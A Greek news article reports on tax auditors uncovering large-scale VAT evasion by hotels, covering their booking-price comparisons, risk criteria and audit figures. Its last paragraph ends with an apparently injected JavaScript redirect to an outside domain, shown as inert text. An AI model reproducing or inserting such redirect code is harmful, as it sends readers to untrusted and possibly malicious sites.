«Πεντάστερη» φοροδιαφυγή – μαμούθ αποκάλυψαν οι «Ράμπο» της ΓΓΔΕ

0
12

 

Φοροδιαφυγή – μαμούθ σε πεντάστερα ξενοδοχεία, κι όχι μόνο, διαπίστωσαν οι Ράμπο της Γενικής Γραμματείας Δημοσίων Εσόδων. Μια ομάδα εξ αυτών, χρησιμοποιώντας μια νέα, ειδική μεθοδολογία, άρχισε να ερευνά τις κρατήσεις και τις τιμές μέσω ίντερνετ. Ανέλυσε τα στοιχεία σε ένα δείγμα ξενοδοχείων που υπήρχαν π.χ. στην Trivago ή στο booking.com και στη συνέχεια ξεκίνησε τους ελέγχους.

Σύμφωνα με δημοσίευμα της εφημερίδας ΗΜΕΡΗΣΙΑ, οι ελεγκτές άρχισαν να παίρνουν τηλέφωνο στα ξενοδοχεία προσποιούμενοι τους πελάτες και έπαιρναν τιμές, τις συνέκριναν με τα στοιχεία από το ίντερνετ και κατέληξαν σε εντυπωσιακά συμπεράσματα. Ρωτούσαν εάν υπάρχουν ελεύθερα δωμάτια, καθώς και για να βγάλουν έναν μέσο όρο στις τιμές διανυκτέρευσης.
Κυρίως ότι επικρατεί το απόλυτο χάος, κυκλοφορεί μεγάλης έκτασης «μαύρο» χρήμα και αποκλίσεις που σε κάποιες περιπτώσεις ξεπερνούν τα 3 εκατ. ευρώ σε σχέση με όσα είχαν δηλώσει οι ξενοδόχοι.

Από τις διασταυρώσεις που έγιναν, μόνο για το μήνα Ιούλιο, η ΓΓΔΕ αποφάσισε ότι από τις 901 μεγάλες ξενοδοχειακές μονάδες πρέπει να περάσουν από έλεγχο οι 525. Μάλιστα, για 114 εξ αυτών έχουν ήδη βγει εντολές ελέγχου.
Για 53 από τις περιπτώσεις αυτές είτε δεν υποβλήθηκε δήλωση ΦΠΑ είτε υποβλήθηκε μηδενική δήλωση ΦΠΑ.

Σε άλλες 64 υποθέσεις οι αποκλίσεις στον τζίρο ξεπερνάνε τις 100.000 ευρώ και σε άλλες 384 υποθέσεις διαπιστώθηκαν αποκλίσεις μικρότερες των 100.000 ευρώ

Χαρακτηριστική είναι η περίπτωση πεντάστερου ξενοδοχείου που έκρυψε 4 εκατ. ευρώ σε ένα μήνα.

Εκτός αυτών υπάρχουν τρεις περιπτώσεις ακόμη που ενώ θα έπρεπε με βάση τα στοιχεία να έχουν δηλώσει τζίρο 18.000 με 20.000 ευρώ, τον Ιούλιο σε μια περίπτωση υπέβαλε μηδενικό τζίρο, σε άλλη 147 ευρώ και σε άλλη 148 ευρώ. Ολα αυτά ενώ η πληρότητά τους ήταν πάνω από 95%.

Οι έρευνες
Σύμφωνα με τα στοιχεία, στο στόχαστρο των ελεγκτών της Γενικής Γραμματείας Δημοσίων Εσόδων είχαν μπει 1.545 ξενοδοχεία, τα οποία ερευνώνται ως προς τη δηλούμενη πληρότητα και τις τιμές διανυκτέρευσης.
Αμέσως μετά τα πρώτα στοιχεία που θα καταθέσουν θα προχωρήσουν σε πρόχειρους υπολογισμούς ως προς τον οφειλόμενο ΦΠΑ. Στην περίπτωση που υπάρχει σημαντική απόκλιση μεταξύ των υπολογισμών του υπουργείου Οικονομικών και του δηλούμενου ΦΠΑ από την επιχείρηση, θα διενεργείται επιτόπιος έλεγχος στο ξενοδοχείο και θα ελέγχονται τα βιβλία.

Σύμφωνα με στελέχη της ΓΓΔΕ, η φορολογική αρχή μέσα στο καλοκαίρι αναλυτική κατάσταση όλων των ξενοδοχείων που λειτουργούν στην Ελλάδα, προκειμένου να διαπιστωθεί εάν αυτά πληρώνουν τους αναλογούντες φόρους. Συγκεκριμένα, εάν πληρώνεται ο ΦΠΑ καθώς και εάν τα δηλούμενα κέρδη συσχετίζονται με τις κρατήσεις και τον αριθμό των διανυκτερεύσεων.

Το υπουργείο Τουρισμού ανταποκρίθηκε άμεσα στο αίτημα των φορολογικών αρχών, αποστέλλοντας λίστα με 10.114 ξενοδοχεία. Από τα ξενοδοχεία αυτά επιλέχθηκαν μέσω του συστήματος ανάλυσης κινδύνου (Risk Analysis) 1.545, σε ορισμένα από τα οποία έχει ήδη ξεκινήσει ο έλεγχος.

Στα κριτήρια ανάλυσης κινδύνου που έθεσαν τα στελέχη της ΓΓΔΕ περιλαμβάνονται:
• Η περιοχή, δηλαδή επιλέχθηκαν δημοφιλείς τουριστικοί προορισμοί.
• Η κατηγορία που εντάσσεται το ξενοδοχείο.
• Ο αριθμός των δωματίων.
• Η διαθεσιμότητα του προσωπικού διεύθυνσης (άντληση πληροφοριών από τους υπαλλήλους).

Οι έλεγχοι έγιναν σε τρεις φάσεις. Η πρώτη φάση ξεκινάει από τις 16 Ιουλίου, η δεύτερη από 1η Αυγούστου μέχρι και 15 Αυγούστου και η τελευταία από 16 Αυγούστου μέχρι 31 Αυγούστου.

Οι έλεγχοι με βάση τη μεθοδολογία της ανάλυσης κινδύνου θα επεκταθούν και σε άλλους κλάδους της οικονομίας, όπως για παράδειγμα, τον κατασκευαστικό, τα νοσοκομεία, τις ασφαλιστικές εταιρείες, τα συνεργεία αυτοκινήτων κ.λπ. Σε όλες τις περιπτώσεις θα λαμβάνονται υπόψη τα οικονομικά δεδομένα κάθε κλάδου από μελέτες που έχουν γίνει τόσο από το υπουργείο Οικονομικών όσο και ιδιωτικές εταιρείες.

Σημειώνεται ότι μέχρι το τέλος του έτους εφορίες, ΚΕΦΟΜΕΠ και ΚΕΜΕΕΠ θα πρέπει να εισπράξουν έσοδα ύψους 31,892 δισ. ευρώ και να επιστρέψουν φόρους 3,268 δισ. ευρώ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here